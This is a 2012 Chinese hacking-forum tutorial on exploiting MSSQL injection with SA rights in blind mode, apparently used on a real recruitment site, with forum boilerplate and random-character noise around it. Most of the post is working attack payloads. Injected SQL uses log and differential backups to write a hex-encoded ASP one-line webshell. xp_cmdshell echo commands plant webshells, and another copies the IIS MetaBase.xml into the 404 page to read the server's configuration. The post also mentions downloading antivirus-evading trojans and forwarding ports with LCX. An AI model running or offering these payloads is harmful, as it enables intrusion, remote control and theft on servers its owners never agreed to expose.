找回密码
 立即注册
查看: 3123|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————$ a+ T+ f) h$ T' T
5 Y2 d% [# t( ?

0 [" s/ h+ Z+ J6 E6 K- Q6 r                                                             欢迎高手访问指导,欢迎新手朋友交流学习。* B' Q1 k7 I2 T' e  r6 ]/ R: D
! ?7 l% C+ [3 i, \2 u6 I1 g. v
                                                                 
* M, t: e# g  g                                                                 
, H" X* O% U/ n& W; [0 ~                                                                  论坛: http://www.90team.net/4 Y( b8 E2 {' ^! m4 e7 N4 p# ?

. R7 ~& U1 j5 f  y' L+ m. {- i$ E6 q: {% J5 Y4 i$ e
: T8 ^& J4 d6 ~# C+ X
友情检测国家人才网6 _! Q! `3 G0 R5 W$ e. @" b
  E. C; H: `- C7 ^8 J% W/ _

/ D6 Z% M/ F! q; I4 j8 `) V内容:MSSQL注入SA权限不显错模式下的入侵) B3 R) U  \6 i8 J- u: k

) N: V7 Z' f% P. N
# _, L% x' ~( e9 Y' |一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
) H! w  U8 F  t8 ^' S
2 N$ m& ^" t" q我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
* j  a* n8 N9 T; Y  C6 s, C+ _- T' W, O( u% R4 H3 C

0 i+ l$ u% B+ }; ~5 }: r1 t$ b3 @这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
/ X3 Z2 `  I: s! [- F5 j4 W% ]8 |9 D( _1 w7 {2 D' p
思路:# y/ e2 e) p: C  ~( o! i
" N- _/ a) ]0 ^$ K0 ~
首先:6 x; F, Y: J+ k) Q) s3 J3 |$ r

' W) P1 ?$ o0 I通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
" w9 g, Q) S- I$ C7 t* A+ Q  R& k: i) ]) t) M+ N+ I9 m
1.日志备份获得Webshell% P0 X0 z, K# C9 Q' E
; z2 H1 _. s! H0 r! p
2.数据库差异备份获得Webshell# ]1 p& |1 A; a) e

: m  A, g/ n) v: G3 S4.直接下载免杀远控木马。
  V) z- s3 w- K& c  U1 n/ `: @+ z6 D3 L7 U, n
5.直接下载LCX将服务器端口转发出来5 P2 _; d" {& x. p

- E% j7 U' b3 v0 E1 ]0 r3 x' k6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。, R, o& c" a5 J3 J% l8 W5 C
/ ~) y6 J" j- u0 r

+ S( Z& o; \8 I( g0 r' [
) j, q6 z5 B8 t2 g0 R  ?8 w在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
. p& f3 _2 h0 \) K0 k; s
# ~7 i- m! `! z( P* P我直接演示后面一个方法* v1 }5 \' |/ f. J
# V& m9 W& K  O" C  `8 M
" M; R+ h# V. ]5 e
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL * J2 L; o& I2 [& B3 v: }

; g" w9 W% ^' P7 B6 b' J* e
* h! Q. `6 Q1 r6 ^. y
) z2 @5 h, |! N. H9 j' u
& j" L& i8 F9 X) `8 A* W◆日志备份:
8 Q, ^! b9 M3 {) _
+ ^9 s6 p4 K; o  U
: M- x6 c* ^9 ~8 }$ t1. 进行初始备份
% c3 z8 A* z* d& G. n; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--3 Z0 X% s2 d* _9 |! e

% T# i8 M9 h4 V1 Y7 }. \# a2. 插入数据$ j# G+ {- Y  u- n, D5 _: Y, }
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
4 J6 B5 m9 G  ~: g) E% V$ k
2 r8 W- H# a% z. @& J0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
& z* [( d5 i, {  7 @5 {1 Q" A  n6 L2 i1 @* v
3. 备份并获得文件,删除临时表
. h+ ~! Z3 h: ?( b. q: p: U2 D;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--7 ^. c) _$ U. ^
7 O2 @! K; E9 e9 h
+ S" F; S5 ~6 [. ]% {

% N; V, b: ~; D3 h◆数据库差异备份& H0 X4 J+ f5 ~, O# P7 Q8 z
4 i! c3 ]# k. _4 ]" z/ ?; h
(1. 进行差异备份准备工作3 R% I5 z$ `9 M: v$ L
8 Q' n, ~# Y( g
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
0 P$ t1 R) F# B' Y/ e& s7 h" P2 Q
. T, t: E0 ~4 r3 f! x上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码% n% M! h: S* O* I$ [0 B( ^
" U* ~* |) L6 |1 j4 \# h4 P
: Q4 s- R1 u5 b) e8 d* B+ V
(2. 将数据写入到数据库
) F4 c: Y, g$ `3 ]3 I. ~3 J;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- 3 H, I# A. e6 F# ~4 P3 f8 [/ e! M
: H3 j6 q" v% A1 k9 A+ S
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
! p) J) g# v0 e0 Z( {
" K: x% z$ j! `0 t5 P  p7 C+ Q3. 备份数据库并清理临时文件
- J' T  O* @. X5 [$ {5 ]& J8 d
, K- |" ?. Y! k) [* a7 l) M7 X;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--4 f5 t+ `5 V& Z# `& p
$ [7 l, O$ {1 h' u: G3 O' ^
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 2 {8 h& i% l8 R
7 O. {: g; U9 O( A( q5 y

' S0 e/ ]- C+ K6 W% h
/ I6 M6 ?* j- ]0 ~% q$ T用^转义字符来写ASP(一句话木马)文件的方法:   # F3 i% W" j8 ?: V+ `% E

5 o( G6 r# o2 F5 ?8 u1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--/ E$ v8 |1 M! P5 H8 d! Q

; P/ N# ^+ C' S4 T: I  W" e2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
* f7 a& V- |, K6 d3 }; p( a7 t8 d7 H/ z
读取IIS配置信息获取web路径
7 e+ W2 T% o0 L) ~9 t( d% G' R/ n( q% ]" S
     
' }! E4 V2 |1 g" R+ E7 f" I     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
( F, j" C' d+ p) O) c8 p4 }  X4 Q: @, m8 o2 _) U/ ]
执行命令' M; [" t# R- j/ K
     
6 O- Y  }/ ~# Z/ s1 b" `" i! n1 V     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
, b6 f& S% U) Y, q+ d6 e
, S0 f0 o0 p' B; E" d8 c$ ?' [. |* d: k; x0 C
4 ^7 O# {6 _# Z. ]4 R
+ u/ D& I' a9 d
# l% k# i: v7 e" z8 e! A

- A! R0 r% v7 M/ Q& f3 U7 A4 L) G* t

. X# q5 c) K* Z4 r
6 o4 C6 f0 P8 M7 S3 \; P
0 h7 i5 U+ T' p2 n; K
! D' q* Y" k/ b; [; @  `/ Z
. S; u  ]# O6 T* \
$ [- x$ q9 t6 ^1 R( y- p% L& _
1 c% s  _* ?/ C  S6 p- }% @3 r' Z7 v
9 I/ ]" J3 E2 m: q& K

( B) f% y7 W& S. |+ N  S) ~7 \" c' z
/ c+ |" h" O) r5 b2 A

# V* _# I# W- A: y, i& P5 f
8 n: ?$ D! q8 j+ ~# _# a9 x6 H$ ?# W1 v+ [/ m( Z
( S+ T9 I4 g! D+ ]0 S; r; ?" M' g( Q1 p
! G! p: i, v; s: y. C5 s5 v
& E3 w3 o( z, t/ K! h3 z: f5 r
& k" o( x4 v9 j6 }& q
" V7 W! o( A) v$ Z
& G% H2 V3 |* K6 W7 K4 l, J

  I( T& r3 Q6 r% n' ?3 e+ P% `
% H* r; f3 l3 a; P% B
( B* o& h1 C2 e, q5 q5 e
$ g) e' [4 g5 D  c9 H+ e, j+ _, ]6 J. S
1 C) `2 }% B  `, i. M# x8 X4 K* e
8 f. f: C# G7 \: t% v

: O7 M+ f# [  e4 Y0 Q2 r# C  f8 w$ p, J+ N/ a

( l, j3 Q) x; Y6 U$ W+ |2 \& f: u. T7 |" H

$ C9 E* n$ B# `/ s
# {' I- x. Z! y
, H8 e  ?4 q+ t  _8 \+ k0 @3 V. }5 {) H- l' ^' Y% K
. p8 D% ?( S0 e; K/ p4 D( @3 L

2 c  h/ k( \0 G) B
% s' ^' j5 w. C2 K
5 v+ L4 f- `. k* q& S2 V  H  o. i- O% B- f# w( [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表